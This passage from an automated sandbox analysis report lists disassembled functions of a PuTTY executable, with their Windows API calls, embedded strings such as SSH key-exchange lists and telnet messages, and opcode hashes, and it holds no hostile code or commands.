                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Cursor$ClassLoadLongShow
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c$false && "Bad busy_status"
                    • API String ID: 1160125251-1574196539
                    • Opcode ID: e3113db27e8147c04aa445eff64f12f329d4298bf304d66ff00d57ce1270fa15
                    • Instruction ID: 9cfe70e591606dc21334b5057b3f6cfb231ba1e41ccb2080ed92f2ee38611863
                    • Opcode Fuzzy Hash: e3113db27e8147c04aa445eff64f12f329d4298bf304d66ff00d57ce1270fa15
                    • Instruction Fuzzy Hash: F40126B0548312AFE7151B64AC6ABBE37C5E706359F580665F987D36A0CBB94C00C750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C6C7B7 Relevance: 9.3, APIs: 6, Instructions: 298COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: df1590650640b88c1982b565c5ae7bb04dfb26c4a62b87a919a560cb13f8dc9f
                    • Instruction ID: 3532914c73a60ca8652929e9c308011c2ba718ebe60bcce42a12e0c8f6f2b03b
                    • Opcode Fuzzy Hash: df1590650640b88c1982b565c5ae7bb04dfb26c4a62b87a919a560cb13f8dc9f
                    • Instruction Fuzzy Hash: 8EB11670E002499FDB31CFA9C8C1BBDBBB1AF49304F148158E5A5AB392C7709E42DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB6F90 Relevance: 9.1, APIs: 6, Instructions: 116COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Char$ObjectSelectWidthWidth32
                    • String ID:
                    • API String ID: 4136774150-0
                    • Opcode ID: d2a93c9b5021aea5d7909be684e3ecebdf6ef6bb40a795980dde261338a8cb64
                    • Instruction ID: aea1b2b202936881ee57a780d61ed6f982118935b64c70b937c6d77a39bc881c
                    • Opcode Fuzzy Hash: d2a93c9b5021aea5d7909be684e3ecebdf6ef6bb40a795980dde261338a8cb64
                    • Instruction Fuzzy Hash: B231E7715480105FD7246B18DC99FFE3FE6EB85760F9C0266F802DB2B0CA69DC40E6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C62090 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,00C62087,00C4EA03,00C4E689), ref: 00C6209E
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C620AC
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C620C5
                    • SetLastError.KERNEL32(00000000,00C62087,00C4EA03,00C4E689), ref: 00C62117
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: e9481e6fa8fd5c5c7f847b8795a454029ac7dfdb8d6d84042be22d91ad0d2281
                    • Instruction ID: fe490e1a6143564ab9c8bbf9ad43edd60b1864e9848ad95f84388758bbc89597
                    • Opcode Fuzzy Hash: e9481e6fa8fd5c5c7f847b8795a454029ac7dfdb8d6d84042be22d91ad0d2281
                    • Instruction Fuzzy Hash: A001443260DB16AEA6392779BCC575F2698EB037B5B30033EF621951E1EF528D41F244
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C12030 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 196COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strspn
                    • String ID: 0123456789$SSH PRIVATE KEY FILE FORMAT 1.1
                    • API String ID: 3684824311-1194959283
                    • Opcode ID: c00f1d6e7d677d8f4aa9cd634b0ede2bf941998b823cb6bcd432eee52ef18c3f
                    • Instruction ID: b29fca477d717deca8b34f9aa847f510aacfaf49b79aa8795f23496f8b19bfc7
                    • Opcode Fuzzy Hash: c00f1d6e7d677d8f4aa9cd634b0ede2bf941998b823cb6bcd432eee52ef18c3f
                    • Instruction Fuzzy Hash: 5261C5F59043406BE710AF20DC4675F7BE4AF85708F14082CF8855A342E7B6DA58EB93
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BE30D0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 126COMMON
                    Download Yara Rule
                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BE31BD
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BE31DB
                    Strings
                    • ecdh,dh-group18-sha512,dh-group17-sha512,dh-group16-sha512,dh-group15-sha512,dh-group14-sha1,rsa,WARN,dh-group1-sha1,dh-gex-sha1, xrefs: 00BE0C8D, 00BE30D3
                    • TerminalModes, xrefs: 00BE30FD, 00BE310D
                    • ecdh,dh-gex-sha1,dh-group18-sha512,dh-group17-sha512,dh-group16-sha512,dh-group15-sha512,dh-group14-sha1,rsa,WARN,dh-group1-sha1, xrefs: 00BE0C92, 00BE0D0A, 00BE30D1
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ___from_strstr_to_strchr
                    • String ID: TerminalModes$ecdh,dh-gex-sha1,dh-group18-sha512,dh-group17-sha512,dh-group16-sha512,dh-group15-sha512,dh-group14-sha1,rsa,WARN,dh-group1-sha1$ecdh,dh-group18-sha512,dh-group17-sha512,dh-group16-sha512,dh-group15-sha512,dh-group14-sha1,rsa,WARN,dh-group1-sha1,dh-gex-sha1
                    • API String ID: 601868998-4179141825
                    • Opcode ID: 9c9e972b98ff28253b671f3b13f49b0f3516c51b2007cf3ac95e0bd50104c811
                    • Instruction ID: b65168908e24d40bf6ebf742545318049a62f7491716bf1753bd97b449aaa816
                    • Opcode Fuzzy Hash: 9c9e972b98ff28253b671f3b13f49b0f3516c51b2007cf3ac95e0bd50104c811
                    • Instruction Fuzzy Hash: F13125F69042C82BE72011272C96B7736D98F92B49F5900ECFD8967243FB1A9E049273
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C14510 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strcat_strlen
                    • String ID: %.*s $INVALID-ALGORITHM$VUUU
                    • API String ID: 432593777-4136275203
                    • Opcode ID: 155a440bc566c194fded625be71b0b3a130cd4128570d9767701401dbc2fe5e1
                    • Instruction ID: 385968021d772f2a4dd62afb7448834ab3f643fa23dcfcfda1bb43d9cc786f8d
                    • Opcode Fuzzy Hash: 155a440bc566c194fded625be71b0b3a130cd4128570d9767701401dbc2fe5e1
                    • Instruction Fuzzy Hash: F431E3B19083186FD304EF19EC81B9BB7D8AB85348F04453DF88987242E674DA489BD2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCEBE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BF9440: GetLocalTime.KERNEL32(?,?,?,?,00BD4A24,?), ref: 00BF9456
                    • _strftime.LIBCMT ref: 00BCEC09
                    • SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000,00000000), ref: 00BCEC88
                    • SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 00BCEC9E
                    • SendDlgItemMessageA.USER32(000003E9,00000197,-000000FF,00000000), ref: 00BCECB6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemMessageSend$LocalTime_strftime
                    • String ID: %Y-%m-%d %H:%M:%S
                    • API String ID: 3243744690-819171244
                    • Opcode ID: 26ea033d1bf0943d3731fc06ea7411b4414795db302fcf9215644d9120a1de2d
                    • Instruction ID: 30d4f3aa22119339b99b53274a82786a4ac8058e2e7888ac943b91e61815d444
                    • Opcode Fuzzy Hash: 26ea033d1bf0943d3731fc06ea7411b4414795db302fcf9215644d9120a1de2d
                    • Instruction Fuzzy Hash: 173121B1A00200EBE700AB24FC92F2E37E5EB69714F584768F855EB3E0D671E904CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BE4AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,00BE4659), ref: 00BE4AFB
                    • DeleteFileA.KERNEL32(00000000,00000002,00000000,?,00BE4659), ref: 00BE4B0C
                    • GetLastError.KERNEL32 ref: 00BE4B16
                    • GetLastError.KERNEL32 ref: 00BE4B21
                    Strings
                    • Unable to delete '%s': %s, xrefs: 00BE4B32
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CreateDelete
                    • String ID: Unable to delete '%s': %s
                    • API String ID: 3657518308-26304762
                    • Opcode ID: 0826945e86b111b1615d6d28e1852b4139f118ba31738b7bcbfdca4b0564115d
                    • Instruction ID: e6687f0d4600979091a0e30c207327aa9881440d20a980eabe2c3c745d601092
                    • Opcode Fuzzy Hash: 0826945e86b111b1615d6d28e1852b4139f118ba31738b7bcbfdca4b0564115d
                    • Instruction Fuzzy Hash: F501F4B12042526BE7182B756C8AFAF36EDDBC5329F240A28F427C3184EB608D518665
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C5A430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6DF90071,?,?,00000000,00C760A4,000000FF,?,00C5A4FA,00C5A395,?,00C5A596,00000000), ref: 00C5A465
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C5A477
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00C760A4,000000FF,?,00C5A4FA,00C5A395,?,00C5A596,00000000), ref: 00C5A499
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 95bef7caf97348d3b16ab8c6f1704b1985b0f7c7c96b5fe94e6b8e7526503e65
                    • Instruction ID: 05b91d6dc759bae37078918aa57b378feec37fd0619a4e7272d05d060a802420
                    • Opcode Fuzzy Hash: 95bef7caf97348d3b16ab8c6f1704b1985b0f7c7c96b5fe94e6b8e7526503e65
                    • Instruction Fuzzy Hash: DB01D635910619FFCB029F90DC09BBEBBB8FB44B15F004625F822E26D0DBB49904CA98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCF1E0 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                    Download Yara Rule
                    APIs
                    • ReleaseCapture.USER32(?,?,?,?,?,?,?,?,00BCDD0D,?,?,?), ref: 00BCF245
                    • GetWindowPlacement.USER32(?,?,?,?,?,?,?,?,?,?,00BCDD0D,?,?,?), ref: 00BCF29F
                    • SetWindowPlacement.USER32(?), ref: 00BCF2BA
                    • GetCapture.USER32 ref: 00BCF30C
                      • Part of subcall function 00BBB5C0: DeleteFileA.KERNEL32(?), ref: 00BBB5EA
                      • Part of subcall function 00BF8140: GetWindowLongA.USER32 ref: 00BF8164
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$CapturePlacement$DeleteFileLongRelease
                    • String ID:
                    • API String ID: 2096018050-0
                    • Opcode ID: 4514b323fe8c6d129dc7f6c958f4151cf165e5326adc1a45370fecbeede2440a
                    • Instruction ID: 89f3c5e05d293f0b4ec3a7cb90dcef023d20078df4fedf12785814bbfe188774
                    • Opcode Fuzzy Hash: 4514b323fe8c6d129dc7f6c958f4151cf165e5326adc1a45370fecbeede2440a
                    • Instruction Fuzzy Hash: DA311475504282ABF7119B309C89F7E76E6EBC6308F1844F9F8494B242D774494BC776
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB21A9 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                    Download Yara Rule
                    APIs
                    • GlobalLock.KERNEL32 ref: 00BB21AA
                    • _strlen.LIBCMT ref: 00BB2395
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000), ref: 00BB23B0
                    • _strlen.LIBCMT ref: 00BB23C4
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000), ref: 00BB23D7
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide_strlen$GlobalLock
                    • String ID:
                    • API String ID: 2105387149-0
                    • Opcode ID: 54bd8f67b50880bae0012bd37ebc10757f88ebf1acffce4c22c8768cf490a85a
                    • Instruction ID: 50bdc9d75e8586ce76ad37a2cee8e1bb0b079d245565b6757ebfde028b035c5b
                    • Opcode Fuzzy Hash: 54bd8f67b50880bae0012bd37ebc10757f88ebf1acffce4c22c8768cf490a85a
                    • Instruction Fuzzy Hash: 7E21D8B294030477E22037616C87FBB32D8DF41764F584124FE059A2C2EA98691892E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BBA9D0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowLongA.USER32 ref: 00BBA9DA
                    • SetWindowLongA.USER32 ref: 00BBAA39
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000027,?,?,?,00BB2D45,?,?,?), ref: 00BBAA51
                    • CheckMenuItem.USER32(00000180,00000000), ref: 00BBAA6A
                    • CheckMenuItem.USER32(00000180,00000000), ref: 00BBAA79
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$CheckItemLongMenu
                    • String ID:
                    • API String ID: 730651012-0
                    • Opcode ID: d9b8c79ba917b4d6b7304a01d536390ce87ee27423c890a91f18e7a6aa25c390
                    • Instruction ID: 8c39eebadcd12c3121916a61a79fc06311ea51e412296353c576028156aa153b
                    • Opcode Fuzzy Hash: d9b8c79ba917b4d6b7304a01d536390ce87ee27423c890a91f18e7a6aa25c390
                    • Instruction Fuzzy Hash: 2401A272A94110BBDE112B14FC06F6D3F61E745725F350360F616A61F0DE7128119B84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BBA8A0 Relevance: 7.5, APIs: 5, Instructions: 25windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsZoomed.USER32(00BB3EAE), ref: 00BBA8A6
                    • GetWindowLongA.USER32 ref: 00BBA8B8
                    • IsZoomed.USER32 ref: 00BBA8CB
                    • SendMessageA.USER32(00008003,00000000,00000000), ref: 00BBA8E9
                    • ShowWindow.USER32(00000003), ref: 00BBA8FB
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: WindowZoomed$LongMessageSendShow
                    • String ID:
                    • API String ID: 4028103791-0
                    • Opcode ID: 627f3dbe6a608b42c59395ee49c1322ccf1eec8fc69e8394c28540aec2a7464f
                    • Instruction ID: 3fbac7e55a63d2597ee50e6301b93c9afb6b05bae7d24a2a7efdcb855ebb4744
                    • Opcode Fuzzy Hash: 627f3dbe6a608b42c59395ee49c1322ccf1eec8fc69e8394c28540aec2a7464f
                    • Instruction Fuzzy Hash: 7EF0ED70640205EBDF112F10FD4EFAE3B69EB01705F280664B203A59F0EBB14490EB09
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C6E952 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 369COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __freea
                    • String ID: a/p$am/pm
                    • API String ID: 240046367-3206640213
                    • Opcode ID: 23a7f7b0e0fec22d0e199a21271a8834022ba4d92683ccfb0a6e7e32439f166b
                    • Instruction ID: 0917b96769eb0e9a6c107890ee3f05aa0de600cc7464e78b4c49d5e5865e361d
                    • Opcode Fuzzy Hash: 23a7f7b0e0fec22d0e199a21271a8834022ba4d92683ccfb0a6e7e32439f166b
                    • Instruction Fuzzy Hash: A2C1E03D900216DBDB348FA9C4C9ABABBB0FF56700F28405BE915AF295D3319E41DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BDADB0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320COMMON
                    Download Yara Rule
                    Strings
                    • client subnegotiation: SB TTYPE IS %s, xrefs: 00BDB35F
                    • server subnegotiation: SB TTYPE SEND, xrefs: 00BDB349
                    • server subnegotiation: SB TTYPE <something weird>, xrefs: 00BDB415
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE <something weird>$server subnegotiation: SB TTYPE SEND
                    • API String ID: 0-1023599780
                    • Opcode ID: 4acc79ddb88395480ca8a2e1b2debabfbe6c50870e2ce9dfb6f9f4b63d863c39
                    • Instruction ID: e5be20e6ecd9efac8ddb2b9d1fc465580d121154e581b336a3838c855b5a874f
                    • Opcode Fuzzy Hash: 4acc79ddb88395480ca8a2e1b2debabfbe6c50870e2ce9dfb6f9f4b63d863c39
                    • Instruction Fuzzy Hash: 6DB1F370608341EFDB148B24CC85F2AF7E5EB85314F6486AAE49A8B3D2F331D845D752
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCEF10 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BCF180: SetWindowTextA.USER32(?,?), ref: 00BCF18F
                      • Part of subcall function 00BCF180: GetWindowLongA.USER32 ref: 00BCF1A1
                      • Part of subcall function 00BCF180: SetWindowLongA.USER32 ref: 00BCF1B0
                    • LoadIconA.USER32(000000C9), ref: 00BCEF4E
                    • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00BCEF5D
                      • Part of subcall function 00BF93A0: GetDesktopWindow.USER32 ref: 00BF93B2
                      • Part of subcall function 00BF93A0: GetWindowRect.USER32 ref: 00BF93BE
